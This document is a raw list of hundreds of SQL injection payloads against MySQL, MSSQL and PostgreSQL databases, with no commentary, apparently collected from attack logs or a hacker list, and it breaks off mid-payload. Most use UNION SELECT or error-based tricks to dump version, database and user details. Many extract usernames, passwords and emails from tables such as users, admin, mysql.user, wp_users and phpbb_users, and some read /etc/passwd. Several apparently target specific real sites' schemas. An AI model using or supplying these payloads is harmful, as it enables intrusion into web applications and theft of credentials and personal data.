1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -31 union select 1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7,8/* -31' union select 1,2,3,4,5,version(),7,8,9,10,11,12,13 -- -31 union select 1,2,3,4,concat(0x2a,user(),0x2a,version(),0x2a,database()),6,7,8,9,10,11,12,13,14 -31 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13 from users/* -31 union select 1,2,3,4,concat(username,0x3a,userpassword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from user/* 31 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/* -31' union select 1,2,3,4,unhex(hex(concat_ws(0x3a,version(),user(),database()))),6,7 -- -31 union select 1,2,3,4,User(),DataBase(),version(),8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,38/* -31 union select 1,2,3,concat_Ws(0x3a3a,login,passw),5 from users limit 2,1 -- -31' union select 1,2,3,concat_ws(0x3a3a,login,password),5,6 from users -- 31 UNION SELECT 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13 LIMIT 1,1/* -31 union select 1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -31 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5 -- -31 union select 1,2,3,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME) SEPARATOR 0x3C62723E),5,6,7,8,9,10,11,12,13 from information_schema.columns where column_name like 0x257061737325 or column_name like 0x25702577256425-- -31 union select 1,2,3,null,concat_ws(0x3a,user,password),version(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from users/* -31 union select 1,2,3,unhex(hex(concat_ws(0x3a,login,0x3a,password))),5,6,7,8 from users-- -31 union select 1,2,3,user,5,6 from mysql.user/* -31 union select 1,2,concat(database(),char(58,58),user(),char(58,58),version()),4,5,6,7,8,9,10,11,12/* -31 union select 1,2,concat(version(),0x20,database(),0x20,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62-- -31 union select 1,2,concat_ws(0x3A3a,version(),database()),4,5/* -31 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12/* -31 union select 1,2,concat_ws(char(58),user(),database(),version()),4,5-- -31 union select 1,2,concat_ws(version(),user(),database()),4,5,6-- -31 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e-- -31 union select 1,2,unhex(hex(version())),4-- -31 union select 1,2,version(),user()-- 31 UNION SELECT 1,CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(id,0x7873716C696E6A64656C,username,0x7873716C696E6A64656C,password) FROM royal_royalife.tb_admin),0x7873716C696E6A656E64),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -31 union select 1,concat(IDUser,char(58),UserID,char(58),UserPassword),3,4,5 from tbl_admin/* -31 union select 1,concat(login,0x20,pwd) from lv_users-- -31 union select 1,concat(password,CHAR(32,62,62,32),email),3,4,5,6 from users limit 0,5000/* -31 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -31 union select 1,concat(username,0x3a,password),3 from users/* 31 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- 31 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8 from SGA_ADMIN where ID=1-- -31' union select 1,concat_ws(0x3a,version()),3 from admins/* -31 UNION SELECT 1,concat_ws(0x3a,@@version_compile_os,user(),version(),database()),3,4,5,6-- 31 UNION SELECT 1,concat_ws(0x3,version(),user(),database()),3,4,5 from mysql.user/* -31 union select 1,concat_ws(char(1),name,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from users limit 1,1/* -31 union select 1 from information_schema.tables -- 31' union select 1,version(),3,4,5-- -31 union select 1,version(),3,4,5,6,7,8,9,10,11-- 31 union select 1,version(),database(),4,5,6,7,8,9/* -31' union select unhex(hex(concat_ws(0x3a3a3a,version(),database(),user(),@@version_compile_os))),2,3,4,5,6,7,8-- -31 union select version(),2,3,4,5,6/* -32013 union select 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15 -- -3214 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user,0x3a,password),17,18 from mysql.user limit 0,1/* -3217 union select 1,2,AES_DECRYPT(AES_ENCRYPT(concat(password,0x3a,user),0x71),0x71),4,5,6,7,8,9,10,11 from mysql.user limit 5,1/* -321 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,aes_decrypt(aes_encrypt(group_concat(user,char(58),password),1),1),46,47,48,49 from mysql.user -3221 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user()),20,21,22,23,24/* 322 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from MSysAccessXML 322 UNION SELECT 1,2,3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),11,12/* -322) union select 1,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8-- -322 union select 1,concat_ws(0x3a,database(),user(),version()),3 -- 3238 union select 1,2,3,4,5,6,7,8,9,10,11 from mysql.user limit 1,1/* -323 and 1=2 union select 1,2,concat(0x3a,@@version,user(),database(),@@version_compile_os),4,5 -- -323 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from mysql.user/* -323 union select 1,2,3,4,5,concat(user_login,char(58),user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20 from test.wp_users limit 0,1-- -323 union SELECT 1,2,3,4,concat(name,0x3a,password),6,7,8,9,10,11,12,13 from tab_users limit 1,1-- 3-23 union select 1,cast(version() as binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -323 UNION SELECT 1,concat(0x73716C696E6A666C64,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71)),3,4,5 FROM mysql.user/* -323 union select 1,version(),3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a3a,@@version_compile_os,user(),database()) -- 32432456754100 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105-- -3244 union select user(),database(),3,4,5,6,7,8/* -324 union select 1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/* -324 UNION SELECT 1,2,convert(version() using latin1)/* 324 union select 1,2,user(),4,5/* -324 union select 1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/* 324 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6 -3251 UNION SELECT 1,2,3,group_concat(unhex(hex(column_name))),5,6,7,8,9 FROM INFORMATION_SCHEMA.columns where table_name=0x7573657273-- -32531 union select 1,2,3,fio,city,6,concat_ws(0x20,name,pwd,email,icq),8,9 from chat_users-- -325 UnIon selECt 1,2,3,4,5,version(),7,8,9,10,11,12,13 -- -325 union select 1,concat(username,char(58),userpass),3,4,5,6,7,8 from poll_user/* -325 union select 1,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12 from user_login -- 325 union select version(),2,3,4 limit 1,1/* -326415 union all select 1,2,@@version,user(),5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 326 aNd 1=0 UNION SELECT 1,version(),3,4,5,6,7,8,9 -- -326 UNION SELECT -326 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/* -326 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),database(),user()),13,14,15,16,17,18,19,20,21,22-- 326 union select concat(database(),char(58),char(60,104,49,62,72,97,99,107,99,101,100,32,98,121,32,99,97,115,104,60,47,104,49,62))/* 32709 or 1=(SELECT TOP 1 cast(logname as nvarchar) ':' cast(password as nvarchar) from users)-- -3271 UNION SELECT 1,concat(user,0x3b,password) from mysql.user limit 1,3/* 3276 and 1=0 union select 1,null,null,null,cast(version()asint),null,null,null,null,null,null,null,null,null,null,null,null,null,null 327 union select 1,2,3,4,0x707265766564203a44/* -327 union select 1,2,3,concat_ws(0x3a,email,icq,login,password),5,6 from 7000_stuff_users limit 0,1/* -327 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39-- -327 union select 1,concat_Ws(0x3a3a,ID,user,pass,thegroup),3,4,5,6,7 from cmsusers -- -328 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat(password,0x3a,username),21,22,23,24,25,26,27,28,29,30,31,32 from users/* 328 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -328 /*!union*/ select 1,2,3,/*!group_concat(username,0x3a,password*/,0x0b),5,6,7,8 /*!from*/ /*!inyahead_inyahead.exponent_user*/ -- -328 union select 1,2,user(),4,5,version()/* -328 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9 -- 32.9 union all select 1,concat_ws(0x3a,user(),version(),database()),3 -- -329 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,version(),user(),database()),9,10,11,12,13,14,15 -- -329 union select 1,concat_ws(0x3a,username,user_email,user_icq,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15 from phpbb_users limit 0,1/* 32 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 32 and 1=0 union select 1,2,3,version(),5-- 32' and 1=0 UNION SELECT 1,2,3,version(),5 -- 32 and 1=0 union select 1,2,unhex(hex(concat_ws(0x3a,username,password))),4,5,6,7,8,9 from user-- 32 and 1=0 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- 32 and 1=2 uNIon sELecT 1,2,3,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),5,6,7 -- -32 and 1=2 union select 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7 -- 32 and 1=(select version()::int from pg_user) 32' or(1,1)=(select count(0),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- 32 uniOn/*pp*/select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version()),13,14,15-- -32 union select 0,1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9/* -32 UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user(),0x3a,database())/* -32 union select 1,2,3,4,5,6,7,8,9,10,null,12,concat(U_LoginName,":",U_Password) from w3t_Users where U_Name="Arafat"/* -32' union select 1,2,3,4,5,6,7,8,9,group_concat(version(),0x3a,user(),0x3a,database() separator 0x0),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 -- -32 union select 1,2,3,4,5,6,concat(username,0x3a,password,0x3a,email),8,9,0,1,2,3,4,5,6,7 from cmsUsers limit 0,1/* -32 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()) -32 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8-- -32 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 32 union select 1,2,3,4,concat_ws(0x3A,version(),user(),database()),6,7,8,9,10,11,12,13-- -32 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -32 union select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)-- -32 union select 1,2,3,concat(email,0x3a,password),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 from users limit 1,1 -32 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16-- 32 union select 1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5-- -32 union select 1,2,concat_ws(0x3a,username,password,email),4 from utenti -32 union select 1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7,8/* 32 union select 1,2,database(),4,version() -32 union select 1,aes_decrypt(aes_encrypt(convert(concat(id,0x3a,nick,0x3a,name,0x3a,email,0x3a,website),binary),0x71),0x71),3,4,5,6,7 from users limit 0,1-- 32 union select 1,concat(login,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,pwd,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,email),3,4,5,6,7,8,9,10 from users/* -32 union select 1,concat_ws(0x3a3a3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from shop -- -32' union select 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from users limit 0,1 -- -32 union select 1,concat_ws(0x3a,id,login,pwd),3,4,5,6,7,8 from rcnit_kz.auth-- -32 union select 1,concat_ws(0x3a,(select name from users),(select password from users),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14 32 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10-- -32 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15-- -32 union select 1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15-- 32 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),Database(),User()),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 LIMIT 1,1-- -32 union select concat(name,char(58),pass) from auth -- -32 union select concat_ws(version(),0x3a,user()),2,3-- -32 union select NULL,NULL,NULL,cast(table_name as binary) from information_schema.tables -- -32 union select version() 330988881 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,user(),version(),database()),30,31,32,33,34,35-- 330 and 1=version()::int -330 union select 1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18 from joomla.jos_users -- -330' union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,24/* -3313 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),version(),database()),17,18,19,20,21,22,23,24,25,26,27,28 -- -3316 union select 1,2,3,4,concat_ws(0x3a,login,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from users where id=1 limit 0,1/* -3316 union select concat_Ws(0x3a,version(),database(),user(),@@version_compile_os) 3318908098 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -3318 union select 1,2,table_name,4,5,6,7,8,9,0,1,2,3,4 from information_schema.tables/* -331 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9 from members-- -3326' uNIon sELEct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- -3329 union select 1,2,3,4,5,concat(login,char(58),pass),7,8,9,10 from user-- -332 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8 from users-- 3333 union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8-- 3337' union select 1,2,3,4,5,6,7,8# AND '1'='1 -333946 union select 1,2,3,4,5,concat_ws( 0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -333 union/*ii*/select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9 from information_schema.columns-- 333 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from "table_name" -333 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6-- -333 union select 1,user(),concat(0x2d2d2d2d2d2d2d2d2d2d2d2d2d3e,table_name) from information_schema.tables limit 5,2/* -3341 union select null,null,@@version,null,null,null,null,null,null,null,null,null,null from price -3343' union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13-- 334 union select 1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17 limit 1,1/* -334 union select 1,2,3,4,5,concat_ws(char(58,58),user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* -334 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* -334 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* -33539 UNION SELECT 0,UNHEX(HEX(concat_ws(0x0b,user(),version(),database()))),2,3,4,5,6,7,8,9,10,11,12,13 -335 UNION ALL SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x3a,name,0x3a,email,0x3a,phone,0x3a,status,0x3a,createdby,0x3a,created,0x3a,updated,0x3a,lastlogin),7,8,9 from cms_users -- -335 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54 -- 335 union select 1,concat(login,0x7c,pass),3,4,5,concat_ws(0x2F,version(),user(),database()) from users limit 3,3//* 3366' or (1,1)=(select count(0),concat((select concat(ed_username,char(58),ed_password) from editor limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- -33681 union select 1,2,3,4,concat(user(),version(),database(),@@version_compile_os)-- -3369 union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13 -336 UNION SELECT 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 336 union select 1,concat(login,char(58),pass),3,4,5,6 from users/* -336 union select 1,concat_ws(0x3a,user(),version()),3,4,5,6,7,8/* -3371 union select 1,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4-- -3372 union select concat_ws(0x3a,username,passwd),2,3,4,5,6,7,8,9,0,1 from enter_users-- -33781 union select 1,name,password,4,5,6,7,8,9 from user limit 1,1 -- 3378 AND (1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57) = (SELECT * FROM users UNION SELECT 1,2,3%250,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 LIMIT 1)/* 3378 union select 1,2,3,4,5,group_concat(concat_ws(0x3a,version(),user,password)),7,8,9,10,11,12,13,14,15,16 from users/* -337' union select 1,2 -- -337 union select 1,2,3,4,5,group_concat(LoginName,char(58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from ezzs_admin_user 337 union select 1,2,3,4,concat(user_password,char(58),username),6,7,8,9,0,1,2,3,4,5,6,7 FROM phpbb_users/* 337 union select 1,2,3,4,concat_ws(0x2a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18 -3386' union select 1,2,3,USER(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,DATABASE() from classifieds_advertisement where id='3386'/* -3388244 union select 1,concat_ws(0x3a3a3a,user(),database(),version()),3,4,5,6,7,8,9,10,11-- 338-999.9 union select @@version,2,3,4,5,6,7,8,9,10-- -3392 union select concat(user_name,0x3a,password,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from user limit 1,1/* -3395 union select 1,2,3,4,table_name,6 from information_schema.tables/* 339992 union select 1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(version(),0x73),0x73),8,9,10-- 339 union select 1,2,3,4,5,6,concat_ws(0x3a,database(),version(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33-- -339 union select 1,2,concat_Ws(0x3a,database(),user(),version()),4,5,6,7,8,9,10,11 -339 union select 1,2,version(),user(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -339 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3/* 33 and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.tables where table_schema=database() -- 33 and 1=0 union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=0x2e69632d73666572612e7275-- 33 and 1=0 union select 1,unhex(hex(concat_ws(0x3a3a3a,version(),database(),user()))),3,4,5,6,7,8,9,10,11,12-- 33 and 1=2 union all select 1,2,3,concat(user,char(58),password),5,6,7,8,9 from mysql.user/* 33 and 1=2 union select 1,2,3,concat(version(),0x3a,database()),5,6 -- 33 and 2=1 union select 1,concat_ws(0x3a,login,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from team# 33 and 2=1 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# -33 OR 1=(SELECT TOP 1 table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_name NOT IN ('ProductTbl~bak', 'CategoryTbl','CategoryTbltest','CategoryTypeTbl','CategoryTypeTbltest','emailTBL','emailTbltest','Order_Details','Order_Detailstest','OrderTbl','OrderTbltest','PricingTbl','PricingTbl~bak','PricingTblA','PricingTbltest','ProductTbl','ProductTblA','ProductTbltest','TestTBL','TrayPricingTbl','TreeList_Tmp','sysconstraints','syssegments'))-- -33 union select 0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from login 33' union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2/* -33 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -33' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 -- -33 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,group_concat(table_name,0x3A SEPARATOR 0x0b),34,35 FROM information_schema.tables WHERE table_schema=0x623333373437-- -33 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(id,0x3a,username,0x3a,password),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from admin-- -33 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_id,0x3a,username,0x3a,password) from user_login limit 684,1/* -33 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a3a,version(),user(),database()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -33 union select 1,2,3,4,5,6,7,8 users/* -33 union select 1,2,3,4,5,6,7,concat(full_name,0x3a,phone_number,0x3a,city,0x3a,street_address_b,0x3a,id,0x3a,email_address,0x3a),9 from users/* -33 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,10,11,12,13,14,15,16,17-- -33' union select 1,2,3,4,5,6,version(),8,user(),database(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* -33 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 from utenti limit 0,1/* -33 union select 1,2,3,4,5,version(),database(),8,9,10,11,12,13,14,15,16,17,18,user()-- -33 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1-- 3-3 union select 1,2,3,4,version(),6,7 -- -33 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9/* 33 ' union select 1,2,3,version(),5,6 -- -33 union select 1,2,concat(login,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from admin -33 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 33 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15 limit 1,1/* -33 uniOn seleCt 1,2,group_concat(ID,0x3a,login,0x3a,PASSWORD,0x3a,email,0x0b),4,5,6,7 from hostgkwf_russianst.AUSER-- -33 union select 1,2,username,password,5,6,7,8,9 from admin /* -33' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -33 union select 1,2,version(),4,user()-- 33 union select 1,concat(0x2a,version(),database()),3,4,5,6,7,8,9,10,11,12,13 33 union select 1,concat(login,0x3a,0x3a,0x3a,pwd,0x3a,0x3a,0x3a,0x3a,email),3,4,5,6,7,8,9,10 from users/* -33 union select 1,concat(username,0x3a,password),3,4,5 FROM users -- -33 union select 1,concat(version(),char(58),user(),char(58),database())/* -33 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6/* -33 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10-- -33 union select 1,concat_ws(0x3,user_name,user_password),3,4,5 from tbl_user/* -33 union select 1,concat_ws(char(58,58),user(),database(),version()),3,4/* -33 union select 1,convert(version() using latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -33 union select 1,TABLE_NAME,version() from INFORMATION_SCHEMA.TABLES limit 1,1/* -33 union select 1,@@VERSION,3,4-- -33 union select 1,version(),3,4,5/* -33' union select concat_ws(0x3a,user(),database(),version()),2,3,4,5,6 -- -33 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5/* -3400232 union select 1,2,3,4,5,concat_ws(0x3a,id,user,pass),7,8,9,0,1,2,3,4,5,6,7 from admin -- -3401259 union select concat_ws(0x3a,version(),@@version_compile_os,user()) -- -3401518 UNION SELECT 0,1,2,concat_ws(0x0b,user(),version(),database()),4,5,6,7 34079-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 -- 340 and 1=2 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 -- 34105-000.001 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -3412 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()@version_compile_os),7,8-- 3414 and 1=0 union select unhex(hex(concat_ws(0x3a,user_name,password))) from admininfo -- 341 and 1=0 union select 1,concat_ws(0x3a,admin_username,admin_password,admin_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin_users-- 341 union select 1,2,3,4,5,6,7,concat(name,0x3a,pass),9,10,11,12,13,14,15,16,17,18,19,20 from members limit 5,1/* 341 union select 1,2,3,4,5,6,7,name,9,10,11,12,13,14,15,16,17,18,19,20 from members limit 1,1/* -341 union select 1,2,3,4,5,concat_ws(0x3a3a,username,user_password,user_email,user_type),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from forum_users /* -341 union select 1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6/* -3426 union select 1,2,3,4,concat(table_name,0x0b),6,7 from information_schema.tables where table_schema=0x6b69726f766b61-- 342 or (1,1)=(select count(0),concat((select password from 